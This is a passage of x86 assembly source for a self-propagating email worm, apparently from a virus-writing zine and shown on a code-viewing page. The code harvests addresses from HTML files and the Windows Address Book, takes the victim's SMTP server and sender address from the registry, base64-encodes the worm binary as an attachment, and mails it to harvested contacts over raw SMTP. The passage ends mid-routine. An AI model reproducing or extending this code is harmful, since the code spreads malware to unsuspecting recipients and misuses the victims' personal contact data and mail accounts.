📄 29a-7.007
字号:
inc edx
CopyChar:
stosb
jmp NextChar
SkipChar:
inc esi
jmp NextChar
EndChar:
xor al,al
stosb
pop edi
test edx,edx ; if EDX=0, mail is not
je SeekMailToStr ; valid (no '@')
cmp dword ptr [NbEmailFound], 0
je NoEmailYet
mov edi, [EmailCurrentPos]
mov eax, [edi]
sub edi, 64
cmp eax, [edi]
je SeekMailToStr
NoEmailYet:
inc dword ptr [NbEmailFound]
cmp dword ptr[NbEmailFound], NbEmailWanted ; ENOUGH EMAILS FOUND !
je CloseHtml_MapViewHandle ; YES...
jmp SeekMailToStr ; get next email address
;........................ Find Email in WAB ..................................
;.............................................................................
SearchWabFile_Email:
call Clear_TempPath&Name
GetWabPath:
mov dword ptr[KeySize], 260 ; Init Size to get
push offset KeySize
push offset TempPath&Name
push offset Reg
push 0
@pushsz "Software\Microsoft\Wab\WAB4\Wab File Name"
push 80000001h
api _SHGetValueA
test eax, eax
jne EndWab
Open&Map_WabFile:
call Open&MapFile
jc EndWab
WabSearchEmail:
mov ecx, [eax+64h] ; Nb of address
jecxz WabUnmapView ; No address
mov dword ptr[NbEmailFound], ecx ; For the Html search
mov [NbWabEmail],ecx ; For the emailfile
TruncFriend:
cmp ecx, NbEmailWanted ; Too many Friend
jbe NotManyFriend
mov ecx, NbEmailWanted ; To many @, reduce it
dec ecx ; for Html search (inc [NbEmailFound]!)
mov dword ptr[NbEmailFound], ecx ; For the Html search
mov [NbWabEmail],ecx ; For the emailfile
NotManyFriend:
mov esi, [eax+60h] ; email @ array
add esi, eax ; normalise
mov edi, dword ptr[EmailList] ; where store email
GetWabEmailLoop:
call StockWabEmail
dec ecx
jnz GetWabEmailLoop
WabUnmapView:
call Open&MapFileUnmapView
EndWab:
ret
StockWabEmail:
push ecx esi
push 40h
pop ecx
cmp byte ptr [esi+1],0
jne StockWabEmailLoop
StockWabEmailUnicodeLoop:
lodsw ; Unicode
stosb ; Ansi
dec ecx
test al, al
jne StockWabEmailUnicodeLoop
add edi, ecx ; next email field in Dest
pop esi ecx
add esi, 44h ; next email field in Wab
ret
StockWabEmailLoop:
movsb ; Ansi
dec ecx
test al, al
jne StockWabEmailLoop
add edi, ecx ; next email field in Dest
pop esi ecx
add esi, 24h ; next email field in Wab
ret
;.......................... Send Email SMTP ..................................
;.............................................................................
SendEmail:
call GetUserSmtpServer ; Default Smtp Serveur Found ?
jc SendError ; No
call AttachementSendInit ; init attachement file
mov ebx, NbToSend ; Send NbToSend emails per session
SendRandomEmailLoop:
call SelectEmail ; return email ads in esi
jecxz SendError ; EmailListe empty or NonExploitable
lea edi, CurrentEmail ; <-----------------
mov ecx, EmailSize ; |
rep movsb ; Copy rnd Email in |
NormalSend:
call BuildMessageHeader ; build the mime header
call SmtpConnection
jc SendNext ; smtp error
call SmtpSendCommand
jc SendNext ; smtp error
call SmtpDisConnection
SendNext:
call ClearHeaderMem
dec ebx
jnz SendRandomEmailLoop ; Send #NbToSend emails
SendError:
ret
;.............. Select Email to Send
; OUT: esi point on the email
; ecx = 0 if error
; select first the email from the *.WAB
SelectEmail:
mov ecx, NbEmailWanted
inc ecx
SelectIT:
dec ecx
jz SelectEmailError
mov esi, dword ptr [EmailList] ; emails from file in memory
mov edi, NbEmailWanted ; Rnd Range
call GetRndNumber ; Rnd Nb in edx
cmp dword ptr[NbWabEmail], 0
je TriEMails
dec dword ptr[NbWabEmail]
mov edx, dword ptr[NbWabEmail]
TriEMails:
rol edx, 6 ; edx*emailsize (64)
add esi, edx ; esi on the email
mov eax, dword ptr [esi]
test eax, eax ; No empty email
je SelectIT
mov eax, dword ptr [esi]
or eax, 20202020h ; Lower case
cmp eax, 'mbew' ; No webmaster@xxxxxxxx
je SelectIT
mov eax, dword ptr [esi]
or eax, 20202020h ; Lower case
cmp eax, 'ptth' ; No http:\\xxxxxxxxxxx
je SelectIT
SelectEmailError:
ret
;.............. Init The Attachement File
;Init du mess: header + body
AttachementSendInit:
InitWhoSendName:
call ResMemHeader ; Some Mem for the mime header
mov dword ptr[KeySize], 00000040h ; Init Size to get
push offset KeySize
push offset mailfrom
push offset Reg
@pushsz "SMTP Email Address" ; User mail (for mail from:)
lea eax, AccountKey
push eax
push 80000001h
api _SHGetValueA
InitWormName:
xor al,al
mov ecx,260
lea edi, MyPath
rep stosb
push 260
push offset MyPath
api _GetSystemDirectoryA ; System Dir
@pushsz '\RINS.EXE'
push offset MyPath
api _lstrcat
SmtpNormalSendInit:
call CodeB64File ; return worm file encoded in mem
ret
;.............. Build Message Header
BuildMessageHeader:
push ebx ; for the loop
BuildHeader:
mov esi, dword ptr[MemMessageBody1] ; some mem
BuildFrom:
@pushsz 'From: ' ; From:
push esi
api _lstrcat
push offset mailfrom ; user mail
push esi
api _lstrcat
@pushsz CRLF
push esi
api _lstrcat
BuildTo:
@pushsz 'To: ' ; To:
push esi
api _lstrcat
push offset CurrentEmail ; Email found in *.wab or Html
push esi
api _lstrcat
@pushsz CRLF
push esi
api _lstrcat
BuildSubject:
@pushsz 'Subject: ' ; Subject:
push esi
api _lstrcat
push NbSubject ; nb Subject
pop edi
call GetRndNumber ; edx = rnd nb
lea edi, RndSubjectTb
rol edx, 2 ; table de dd
add edi, edx ; Point the right Subject offset
mov edi, [edi]
push edi ; Rnd Subject
push esi
api _lstrcat
@pushsz CRLF
push esi
api _lstrcat
BuildBody:
push offset MessageBody1 ; Mime bordel jusqu'a -> email message
push esi
api _lstrcat
BuildSizeBody1:
push esi
api _lstrlen
mov dword ptr[MessageSize1], eax ; Header+Mime bordel lenght for send cmd
BuildMessageHeaderError:
pop ebx ; for the loop
ret
;.............. Some Mem For The Mime Header
ClearHeaderMem:
xor al,al
mov ecx, MimeHeaderSize
mov edi, dword ptr[MemMessageBody1]
rep stosb
ret
;.............. Some Mem For The Mime Header
ResMemHeader:
xor eax,eax
push PAGE_READWRITE ; read/write page
push MEM_RESERVE or MEM_COMMIT
push MimeHeaderSize
push eax ; System decide where
api _VirtualAlloc
mov dword ptr[MemMessageBody1], eax
ret
;........................... Send via SMTP ...................................
;.............................................................................
; 4 Part:
; - GetLocalSmtpServeur: Find default SMTP server
; - SmtpConnection: Init Socket + Connect to Smpt host
; - SmtpSendCommand: Send all the commands
; - SmtpDisConnection: Clean + Disconnect
;.............. Get User Server
GetUserSmtpServer:
GetUserInternetAccount:
mov dword ptr[KeySize], 00000040h ; Init Size to get
push offset KeySize
push offset AccountSubKey
push offset Reg
@pushsz "Default Mail Account"
@pushsz "Software\Microsoft\Internet Account Manager"
push 80000001h
api _SHGetValueA
test eax, eax
jne GetUserSmtpServerError
GetUserInternetServer:
mov dword ptr[KeySize], 00000040h ; Init Size to get
push offset KeySize
push offset SmtpServeur
push offset Reg
@pushsz "SMTP Server"
lea eax, AccountKey
push eax
push 80000001h
api _SHGetValueA
test eax, eax
jne GetUserSmtpServerError
clc
ret
GetUserSmtpServerError:
stc
ret
;.............. Smtp Connection
SmtpConnection:
pushad
push offset WSAData ; Struct WSA
push 101h ; VERSION1_1
api _WSAStartup ; Socket Init
test eax,eax ; ok ?
jne WSA_Error ; No, exit with stc
push 0 ; Protocol = 0 (more sure)
push 1 ; SOCK_STREAM
push 2 ; AF_INET (most used)
api _socket ; create socket
inc eax ; -1 = error
je Socket_Error ; WSACleanUp and stc
dec eax
mov [hSocket],eax ; Socket Handle
push 25 ; Smtp port
api _htons ; Convert it
mov word ptr[wsocket+2], ax ; The port ( 2 ptr[wsocket]=AF_INET )
push offset SmtpServeur ; The SMPT Host
api _gethostbyname ; SMPT to IP
test eax,eax ; error ?
je Error_CloseSocket&CleanUp ; Exit + stc
mov eax,[eax+10h] ; get ptr 2 IP into HOSTENT
mov eax,[eax] ; get ptr 2 IP
mov [ServeurIP],eax ; Save it
push 010h ; size of sockaddr struct
push offset wsocket ; Ptr on it
push [hSocket] ; Handle
api _connect ; connect to smtp server
inc eax
je Error_CloseSocket&CleanUp ; Exit + stc
call GetServeurReply ; get server response
jc Error_CloseSocket&CleanUp ; If c=0 Connection OK !
popad
clc
ret
GetServeurReply:
push 0 ; Flags
push 4 ; Get a LongWord
push offset ServeurReply ; in ServeurReply
push [hSocket]
api _recv ; get stmp server error code
cmp eax, 4 ; Receive a LongWord
jne ReplyError ; No, stc
ServeurReplyLoop:
mov ebx, offset ServeurReplyEnd ; Get a byte In
push 0 ; Flags
push 1 ; a byte
push ebx
push [hSocket]
api _recv
jne ReplyError
cmp byte ptr [ebx], 0Ah
jne ServeurReplyLoop ; skip over CRLF
mov eax, [ServeurReply]
cmp eax, ' 022' ; error code
je ReplyOk
cmp eax, ' 052' ; error code
je ReplyOk
cmp eax, ' 152' ; error code
je ReplyOk
cmp eax, ' 453' ; error code
jne ReplyError
ReplyOk:
clc
ret
ReplyError:
stc
ret
;.............. Smtp DisConnection
SmtpDisConnection:
pushad
Error_CloseSocket&CleanUp:
push dword ptr [hSocket]
api _closesocket
Socket_Error:
api _WSACleanup
WSA_Error:
popad
stc
ret
;.............. Smtp Send
SmtpSendCommand:
pushad
SendHelloCmd:
mov esi,offset cmd_helo ; 'HELO xxx',CRLF
push 14 ; cmd size
pop ecx ; cmd size
call SendSocket ; send HELO command
call GetServeurReply ; Ok ?
jc Error_CloseSocket&CleanUp ; No
SendMailFromCmd:
mov esi,offset cmd_mailfrom ; 'MAIL FROM:<'
push 11 ; cmd size
pop ecx ; size
call SendSocket ; send MAIL FROM command
mov esi,offset mailfrom ; ptr default user email
push esi
api _lstrlen
xchg ecx, eax
call SendSocket ; 2⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -